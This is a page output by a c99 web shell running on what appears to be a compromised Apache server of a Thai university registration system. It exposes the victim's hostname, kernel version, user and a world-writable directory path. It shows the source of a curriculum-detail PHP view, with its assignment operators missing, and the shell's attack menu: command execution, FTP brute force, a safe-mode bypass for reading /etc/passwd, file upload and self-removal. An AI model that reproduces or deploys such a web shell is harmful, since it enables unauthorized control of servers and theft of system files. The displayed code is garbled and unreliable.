!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_detailCurriculum.php (4.85 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if($qu_cur->num_rows() > 0) {
    
$row $qu_cur->row();
    
$curImproveY $row->curImproveY;
    
$curName $row->curName;
    
$curNameE $row->curNameE;
    
$curAbbr $row->curAbbr;
    
$curAbbrE $row->curAbbrE;
    
$curDescription $row->curDescription;
    
$curDescriptionE $row->curDescriptionE;
    
$curMinCredit $row->curMinCredit;
    
$curMinGPAX $row->curMinGPAX;
    
$curNumStudyY $row->curNumStudyY;
    
$curMaxStudyY $row->curMaxStudyY;
    
$curNumTmPerY $row->curNumTmPerY;
    
$curStatus $row->curStatus;
}
$row_edg = isset($qu_edg) ? $qu_edg->row() : NULL;
$row_lv = isset($qu_lv) ? $qu_lv->row() : NULL;
$row_cc = isset($qu_cc) ? $qu_cc->row() : NULL;
?>
<table width="100%">
    <tr>
        <td><fieldset>
            <legend align="center"><span class="h error">รายละเอียดข้อมูลหลักสูตร</b></span></legend>
            <div align="center"><br><table class="szone">
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">ปีที่ปรับปรุงหลักสูตร</td>
                    <td class="indent"><?php echo $curImproveY;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">วุฒิการศึกษา</td>
                    <td class="indent"><?php echo explodeSquare(getval('edgName'$row_edg));?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">ระดับการศึกษา</td>
                    <td class="indent"><?php echo explodeSquare(getval('levelName'$row_lv));?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">ชื่อหลักสูตร (ไทย)</td>
                    <td class="indent"><?php echo explodeSquare($curName);?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">ชื่อหลักสูตร (อังกฤษ)</td>
                    <td class="indent"><?php echo explodeSquare($curNameE);?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">ชื่อย่อหลักสูตร (ไทย)</td>
                    <td class="indent"><?php echo $curAbbr;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">ชื่อย่อหลักสูตร (อังกฤษ)</td>
                    <td class="indent"><?php echo $curAbbrE;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">หน่วยกิตรวมขั้นต่ำ</td>
                    <td class="indent"><?php echo $curMinCredit;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">คะแนนเฉลี่ยสะสมตลอดหลักสูตร</td>
                    <td class="indent"><?php echo number_format($curMinGPAX2);?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">สาระสำคัญของหลักสูตร (ไทย)</td>
                    <td class="indent"><?php echo $curDescription;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">สาระสำคัญของหลักสูตร (อังกฤษ)</td>
                    <td class="indent"><?php echo $curDescriptionE;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">จำนวนปีสูงสุดที่เรียนได้</td>
                    <td class="indent"><?php echo $curMaxStudyY;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">จำนวนปีที่เรียนตามปกติ</td>
                    <td class="indent"><?php echo $curNumStudyY;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">จำนวนภาคการศึกษาต่อปี</td>
                    <td class="indent"><?php echo $curNumTmPerY;?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">ประเภทบัณฑิตผู้สำเร็จการศึกษา</td>
                    <td class="indent"><?php echo explodeSquare(getval('ccName'$row_cc));?></td>
                </tr>
                <tr bgcolor="<?php echo $tr_color_even;?>">
                    <td class="coltd_szone2">สถานะหลักสูตร</td>
                    <td class="indent"><?php echo $curStatus;?></td>
                </tr>
            </table></div>
        </fieldset><br></td>
    </tr>
    <tr><td><table class="mark">
            <tr>
                <td class="coltd_mark"><span class="error"><b>หมายเหตุ : </b></span></td>
                <td><span class="error">Y = ใช้อยู่ , N = เลิกใช้แล้ว</span></td>
            </tr>
        </table></td></tr>
    <tr>
    <td align="center"><input type="button" onclick="window.close()" value="ปิดหน้าต่าง" name="close"></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0099 ]--